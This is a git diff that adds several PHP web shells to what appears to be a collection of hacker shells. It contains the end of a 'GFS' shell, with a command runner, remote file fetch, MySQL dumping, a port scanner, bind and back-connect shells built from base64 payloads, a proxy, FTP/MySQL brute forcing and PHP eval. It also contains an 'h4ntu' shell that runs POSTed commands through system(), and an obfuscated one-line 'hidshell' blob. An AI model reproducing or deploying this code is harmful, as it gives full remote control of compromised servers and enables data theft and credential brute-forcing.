+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt b/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt
new file mode 100644
index 0000000..eb61f3d
--- /dev/null
+++ b/xakep-shells/PHP/h4ntu shell [powered by tsoi].txt	
@@ -0,0 +1,78 @@
+<title>h4ntu shell [powered by tsoi]</title>
+<?php
+echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
+?>
+
+<?php
+  closelog( );
+  $user = get_current_user( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $ver = phpversion( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+  if(!$whoami)$whoami=exec("whoami");
+?>
+<meta name="generator" content="Namo WebEditor v5.0">
+<br>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
+
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
+  </TR>  
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
+  </TR>
+  <TR>
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
+  </TR>
+  <TR>
+
+  <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+
+<font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
+</font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
+<font face="courier new" size="2" color="777777">cmd : 
+<INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
+<br>
+<INPUT TYPE="submit">
+</font></FORM>
+
+<hr color=777777 width=100% height=115px>
+
+<pre>
+<?
+$cmd = $_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit;
+?>
+</pre>
diff --git a/xakep-shells/PHP/hidshell.php.php.txt b/xakep-shells/PHP/hidshell.php.php.txt
new file mode 100644
index 0000000..3e43158
--- /dev/null
+++ b/xakep-shells/PHP/hidshell.php.php.txt
@@ -0,0 +1 @@
+<?$d='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